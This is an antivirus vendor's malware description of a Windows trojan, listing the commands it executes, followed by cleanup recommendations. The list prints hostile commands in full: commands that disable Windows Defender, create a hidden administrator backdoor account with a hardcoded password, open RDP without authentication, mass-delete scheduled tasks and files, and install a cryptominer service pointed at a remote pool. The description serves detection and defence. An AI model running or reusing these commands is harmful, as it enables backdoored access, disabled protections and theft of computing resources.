Trojan.MulDrop7.55003

Added to the Dr.Web virus database: 2017-12-19

Virus description added:

Technical Information

Malicious functions:
Executes the following:
  • '<SYSTEM32>\net.exe' stop LocalConnectXdc
  • '<SYSTEM32>\net.exe' stop WindowsDefender
  • '<SYSTEM32>\net.exe' stop LocalConnectMnr
  • '<SYSTEM32>\net.exe' stop Service4
  • '<SYSTEM32>\net.exe' stop sqlservrd
  • '<SYSTEM32>\taskkill.exe' /IM cpuminer-sse42.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM msdtced.exe /F
  • '<SYSTEM32>\taskkill.exe' /f /im HostXmrig.exe
  • '<SYSTEM32>\taskkill.exe' /f /im 1.exe
  • '<SYSTEM32>\net.exe' stop AdobeFlashPlayerHash
  • '<SYSTEM32>\net.exe' stop reg
  • '<SYSTEM32>\net.exe' stop RpcEptManger
  • '<SYSTEM32>\net.exe' stop Samserver
  • '<SYSTEM32>\net.exe' stop WinRDPSvc
  • '<SYSTEM32>\net.exe' stop "CCOM Surrogate"
  • '<SYSTEM32>\net.exe' stop MsUpdateServiceD
  • '<SYSTEM32>\net.exe' stop TaskNetHost
  • '<SYSTEM32>\net.exe' stop RegGroom
  • '<SYSTEM32>\net.exe' stop Googler
  • '<SYSTEM32>\net.exe' stop svchost
  • '<SYSTEM32>\net.exe' stop WSService
  • '<SYSTEM32>\taskkill.exe' /IM msiexeced.exe /F
  • '<SYSTEM32>\taskkill.exe' /f /im user.exe
  • '<SYSTEM32>\taskkill.exe' /f /im microsoft.exe
  • '<SYSTEM32>\taskkill.exe' /f /im *tmp.exe
  • '<SYSTEM32>\taskkill.exe' /f /im schtasks*
  • '<SYSTEM32>\taskkill.exe' /f /im microsofts*
  • '<SYSTEM32>\taskkill.exe' /f /im xmr*
  • '<SYSTEM32>\taskkill.exe' /f /im wscript.exe
  • '<SYSTEM32>\taskkill.exe' /f /im esif.exe
  • '<SYSTEM32>\taskkill.exe' /f /im tmp*
  • '<SYSTEM32>\taskkill.exe' /f /im rigx*
  • '<SYSTEM32>\taskkill.exe' /f /im msiexec.exe
  • '<SYSTEM32>\taskkill.exe' /f /im sa.exe
  • '<SYSTEM32>\taskkill.exe' /IM monero.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM minerg.exe /F
  • '<SYSTEM32>\taskkill.exe' /f /im ggdllhost.exe
  • '<SYSTEM32>\taskkill.exe' /IM cpuminer.exe /F
  • '<SYSTEM32>\taskkill.exe' /f /im Service4.exe
  • '<SYSTEM32>\taskkill.exe' /f /im bitsadmin.exe
  • '<SYSTEM32>\taskkill.exe' /f /im mxsvc.exe
  • '<SYSTEM32>\taskkill.exe' /f /im update.exe
  • '<SYSTEM32>\taskkill.exe' /f /im SystemRunDll3.exe
Modifies file system:
Deletes the following files:
  • %WINDIR%\Temp\Perflib_Perfdata_7e8.dat
Miscellaneous:
Searches for the following windows:
  • ClassName: '' WindowName: ''
Executes the following:
  • '<SYSTEM32>\sc.exe' config RpcEptManger start= Disabled
  • '<SYSTEM32>\net1.exe' stop WinRDPSvc
  • '<SYSTEM32>\sc.exe' config WinRDPSvc start= Disabled
  • '<SYSTEM32>\cmd.exe' /c sc config WinDefend start= disabled
  • '<SYSTEM32>\net1.exe' stop RpcEptManger
  • '<SYSTEM32>\cmd.exe' /c sc config MsUpdateServiceD start= Disabled
  • '<SYSTEM32>\net1.exe' stop Samserver
  • '<SYSTEM32>\cmd.exe' /c sc config RpcEptManger start= Disabled
  • '<SYSTEM32>\cmd.exe' /c net stop RpcEptManger
  • '<SYSTEM32>\cmd.exe' /c net stop MsUpdateServiceD
  • '<SYSTEM32>\cmd.exe' /c sc config WinRDPSvc start= Disabled
  • '<SYSTEM32>\cmd.exe' /c net stop WinRDPSvc
  • '<SYSTEM32>\cmd.exe' /c net user sqlserver h4ckerz90-@!
  • '<SYSTEM32>\cmd.exe' /c net user sqlserver h4ckerz90-@! /ADD
  • '<SYSTEM32>\net1.exe' stop MsUpdateServiceD
  • '<SYSTEM32>\cmd.exe' /c net localgroup Administrators sqlserver /ADD
  • '<SYSTEM32>\sc.exe' config "CCOM Surrogate" start= Disabled
  • '<SYSTEM32>\cmd.exe' /c net localgroup "Remote Desktop users" sqlserver /ADD
  • '<SYSTEM32>\sc.exe' stop WinDefend
  • '<SYSTEM32>\sc.exe' config MsUpdateServiceD start= Disabled
  • '<SYSTEM32>\cmd.exe' /c sc stop WinDefend
  • '<SYSTEM32>\cmd.exe' /c sc config "CCOM Surrogate" start= Disabled
  • '<SYSTEM32>\sc.exe' config WinDefend start= disabled
  • '<SYSTEM32>\cmd.exe' /c net stop "CCOM Surrogate"
  • '<SYSTEM32>\sc.exe' config TaskNetHost start= Disabled
  • '<SYSTEM32>\sc.exe' config RegGroom start= Disabled
  • '<SYSTEM32>\cmd.exe' /c sc config Googler start= Disabled
  • '<SYSTEM32>\net1.exe' stop RegGroom
  • '<SYSTEM32>\cmd.exe' /c sc config WSService start= Disabled
  • '<SYSTEM32>\cmd.exe' /c net stop WSService
  • '<SYSTEM32>\cmd.exe' /c sc config TaskNetHost start= Disabled
  • '<SYSTEM32>\net1.exe' stop sqlservrd
  • '<SYSTEM32>\sc.exe' config Service4 start= Disabled
  • '<SYSTEM32>\net1.exe' stop reg
  • '<SYSTEM32>\cmd.exe' /c net stop Googler
  • '<SYSTEM32>\net1.exe' stop Service4
  • '<SYSTEM32>\net1.exe' stop WSService
  • '<SYSTEM32>\cmd.exe' /c net stop Samserver
  • '<SYSTEM32>\sc.exe' config WSService start= Disabled
  • '<SYSTEM32>\sc.exe' config Samserver start= Disabled
  • '<SYSTEM32>\net1.exe' stop svchost
  • '<SYSTEM32>\cmd.exe' /c sc config Samserver start= Disabled
  • '<SYSTEM32>\net1.exe' stop Googler
  • '<SYSTEM32>\cmd.exe' /c net stop svchost
  • '<SYSTEM32>\sc.exe' config Googler start= Disabled
  • '<SYSTEM32>\sc.exe' config svchost start= Disabled
  • '<SYSTEM32>\net1.exe' stop TaskNetHost
  • '<SYSTEM32>\cmd.exe' /c sc config svchost start= Disabled
  • '<SYSTEM32>\net1.exe' accounts / MaxPWAge: unlimited
  • '<SYSTEM32>\net1.exe' localgroup Administratorer sqlserver /ADD
  • '<SYSTEM32>\net1.exe' localgroup Administrateurs sqlserver /ADD
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
  • '<SYSTEM32>\cmd.exe' /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
  • '<SYSTEM32>\net1.exe' user sqlserver /expires:never
  • '<SYSTEM32>\net.exe' localgroup Administratoren sqlserver /ADD
  • '<SYSTEM32>\net1.exe' localgroup Administratorzy sqlserver /ADD
  • '<SYSTEM32>\cmd.exe' /c net accounts / MaxPWAge: unlimited
  • '<SYSTEM32>\net1.exe' localgroup Administratoren sqlserver /ADD
  • '<SYSTEM32>\cmd.exe' /c net user sqlserver /active:yes
  • '<SYSTEM32>\net.exe' accounts / MaxPWAge: unlimited
  • '<SYSTEM32>\cmd.exe' /c gpupdate /force
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
  • '<SYSTEM32>\cmd.exe' /c SCHTASKS /Delete /TN * /F
  • '<SYSTEM32>\gpupdate.exe' /force
  • '<SYSTEM32>\net.exe' start termservice
  • '<SYSTEM32>\schtasks.exe' /Delete /TN * /F
  • '<SYSTEM32>\cmd.exe' /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v sqlserver /t REG_DWORD /d 0 /f
  • '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
  • '<SYSTEM32>\net.exe' user sqlserver /active:yes
  • '<SYSTEM32>\cmd.exe' /c net start termservice
  • '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v sqlserver /t REG_DWORD /d 0 /f
  • '<SYSTEM32>\net1.exe' user sqlserver /active:yes
  • '<SYSTEM32>\net.exe' localgroup "Remote Desktop users" sqlserver /ADD
  • '<SYSTEM32>\cmd.exe' /c net localgroup Administrateurs sqlserver /ADD
  • '<SYSTEM32>\net.exe' localgroup Administradores sqlserver /ADD
  • '<SYSTEM32>\net1.exe' localgroup Administradores sqlserver /ADD
  • '<SYSTEM32>\net1.exe' user sqlserver h4ckerz90-@! /ADD
  • '<SYSTEM32>\net.exe' localgroup Administrators sqlserver /ADD
  • '<SYSTEM32>\cmd.exe' /c net localgroup Amministratori sqlserver /ADD
  • '<SYSTEM32>\net.exe' user sqlserver h4ckerz90-@! /ADD
  • '<SYSTEM32>\net1.exe' stop "CCOM Surrogate"
  • '<SYSTEM32>\net.exe' localgroup Amministratori sqlserver /ADD
  • '<SYSTEM32>\cmd.exe' /c net localgroup Administradores sqlserver /ADD
  • '<SYSTEM32>\net.exe' user sqlserver h4ckerz90-@!
  • '<SYSTEM32>\cmd.exe' /c net user sqlserver /expires:never
  • '<SYSTEM32>\net.exe' localgroup Administrateurs sqlserver /ADD
  • '<SYSTEM32>\cmd.exe' /c net localgroup Administratorer sqlserver /ADD
  • '<SYSTEM32>\net.exe' user sqlserver /expires:never
  • '<SYSTEM32>\net1.exe' localgroup Administrators sqlserver /ADD
  • '<SYSTEM32>\net.exe' localgroup Administratorer sqlserver /ADD
  • '<SYSTEM32>\net1.exe' localgroup Amministratori sqlserver /ADD
  • '<SYSTEM32>\net1.exe' localgroup "Remote Desktop users" sqlserver /ADD
  • '<SYSTEM32>\cmd.exe' /c net localgroup Administratorzy sqlserver /ADD
  • '<SYSTEM32>\net.exe' localgroup Administratorzy sqlserver /ADD
  • '<SYSTEM32>\net1.exe' user sqlserver h4ckerz90-@!
  • '<SYSTEM32>\cmd.exe' /c net localgroup Administratoren sqlserver /ADD
  • '<SYSTEM32>\cmd.exe' /c del /a %windir%\*.bat
  • '<SYSTEM32>\cmd.exe' /c del /a %windir%\*.vbs
  • '<SYSTEM32>\cmd.exe' /c taskkill /IM msdtced.exe /F
  • '<SYSTEM32>\cmd.exe' /c del /a %programdata%\*.exe
  • '<SYSTEM32>\cmd.exe' /c del /a %programdata%\*.bat
  • '<SYSTEM32>\cmd.exe' /c del /a %programdata%\*.vbs
  • '<SYSTEM32>\cmd.exe' /c taskkill /IM minerg.exe /F
  • '<SYSTEM32>\cmd.exe' /c taskkill /IM monero.exe /F
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im ggdllhost.exe
  • '<SYSTEM32>\cmd.exe' /c taskkill /IM msiexeced.exe /F
  • '<SYSTEM32>\cmd.exe' /c taskkill /IM cpuminer-sse42.exe /F
  • '<SYSTEM32>\cmd.exe' /c taskkill /IM cpuminer.exe /F
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q %windir%\xx64
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q %windir%\xx32
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q %programdata%\32
  • '<SYSTEM32>\cmd.exe' /c del /a %windir%\mpl.exe
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q %windir%\x64
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q %windir%\x32
  • '<SYSTEM32>\cmd.exe' /c del /q /a <SYSTEM32>\monero.exe
  • '<SYSTEM32>\cmd.exe' /c del /a %windir%\microsofts.exe
  • '<SYSTEM32>\cmd.exe' /c del /a %windir%\microsoft.exe
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q %programdata%\x32
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q %programdata%\x64n
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q %programdata%\x64
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im xmr*
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im rigx*
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im wscript.exe
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im microsofts*
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im esif.exe
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im microsoft.exe
  • '<SYSTEM32>\cmd.exe' /c %windir%\fonts\conhost set sqlbrowsers Description "sqlbrowser"
  • '<SYSTEM32>\cmd.exe' /c %windir%\fonts\conhost set sqlbrowsers AppParameters "-a cryptonight -o cloudfront-lc.ddnsking.com:443 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5v...
  • '<SYSTEM32>\cmd.exe' /c %windir%\fonts\conhost install sqlbrowsers "%windir%\fonts\sqlservr.exe"
  • '<SYSTEM32>\cmd.exe' /c %windir%\fonts\conhost start sqlbrowsers
  • '<SYSTEM32>\cmd.exe' /c %windir%\fonts\conhost set sqlbrowsers Start SERVICE_DELAYED_AUTO_START
  • '<SYSTEM32>\cmd.exe' /c %windir%\fonts\conhost set sqlbrowsers DisplayName "sqlserverd"
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im bitsadmin.exe
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im update.exe
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im msiexec.exe
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q %windir%\temp
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im SystemRunDll3.exe
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im sa.exe
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im user.exe
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im schtasks*
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im tmp*
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im mxsvc.exe
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im Service4.exe
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im *tmp.exe
  • '<SYSTEM32>\sc.exe' config WindowsDefender start= Disabled
  • '<SYSTEM32>\cmd.exe' /c net stop sqlservrd
  • '<SYSTEM32>\cmd.exe' /c sc config LocalConnectMnr start= Disabled
  • '<SYSTEM32>\cmd.exe' /c net stop Service4
  • '<SYSTEM32>\cmd.exe' /c sc config sqlservrd start= Disabled
  • '<SYSTEM32>\sc.exe' config LocalConnectXdc start= Disabled
  • '<SYSTEM32>\cmd.exe' /c net stop LocalConnectXdc
  • '<SYSTEM32>\sc.exe' config AdobeFlashPlayerHash start= Disabled
  • '<SYSTEM32>\net1.exe' user systems /delete
  • '<SYSTEM32>\cmd.exe' /c net stop LocalConnectMnr
  • '<SYSTEM32>\net1.exe' stop AdobeFlashPlayerHash
  • '<SYSTEM32>\cmd.exe' /c sc config LocalConnectXdc start= Disabled
  • '<SYSTEM32>\net1.exe' stop LocalConnectMnr
  • '<SYSTEM32>\cmd.exe' /c net stop RegGroom
  • '<SYSTEM32>\net1.exe' stop LocalConnectXdc
  • '<SYSTEM32>\cmd.exe' /c net stop TaskNetHost
  • '<SYSTEM32>\sc.exe' config reg start= Disabled
  • '<SYSTEM32>\cmd.exe' /c sc config RegGroom start= Disabled
  • '<SYSTEM32>\cmd.exe' /c sc config Service4 start= Disabled
  • '<SYSTEM32>\sc.exe' config LocalConnectMnr start= Disabled
  • '<SYSTEM32>\net1.exe' stop WindowsDefender
  • '<SYSTEM32>\cmd.exe' /c sc config reg start= Disabled
  • '<SYSTEM32>\sc.exe' config sqlservrd start= Disabled
  • '<SYSTEM32>\cmd.exe' /c net stop reg
  • '<SYSTEM32>\net.exe' user Admiin /delete
  • '<SYSTEM32>\cmd.exe' /c net user .system /delete
  • '<SYSTEM32>\cmd.exe' /c net user emad /delete
  • '<SYSTEM32>\cmd.exe' /c net user systems /delete
  • '<SYSTEM32>\net.exe' user emad /delete
  • '<SYSTEM32>\net.exe' user sysdba /delete
  • '<SYSTEM32>\cmd.exe' /c del /a %windir%\csrss.exe
  • '<SYSTEM32>\cmd.exe' /c del /a %windir%\dllhostts.exe
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q %programdata%\ServiceProfiles
  • '<SYSTEM32>\cmd.exe' /c net user ` /delete
  • '<SYSTEM32>\cmd.exe' /c net user Admiin /delete
  • '<SYSTEM32>\cmd.exe' /c net user sysdba /delete
  • '<SYSTEM32>\net1.exe' user ` /delete
  • '<SYSTEM32>\net1.exe' user sysdba /delete
  • '<SYSTEM32>\cmd.exe' /c sc config AdobeFlashPlayerHash start= Disabled
  • '<SYSTEM32>\cmd.exe' /c sc config WindowsDefender start= Disabled
  • '<SYSTEM32>\cmd.exe' /c net stop WindowsDefender
  • '<SYSTEM32>\net1.exe' user emad /delete
  • '<SYSTEM32>\net.exe' user ` /delete
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im HostXmrig.exe
  • '<SYSTEM32>\net1.exe' user Admiin /delete
  • '<SYSTEM32>\cmd.exe' /c net stop AdobeFlashPlayerHash
  • '<SYSTEM32>\net.exe' user systems /delete
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im 1.exe

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk, mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.


  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install Dr.Web for Android on the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.
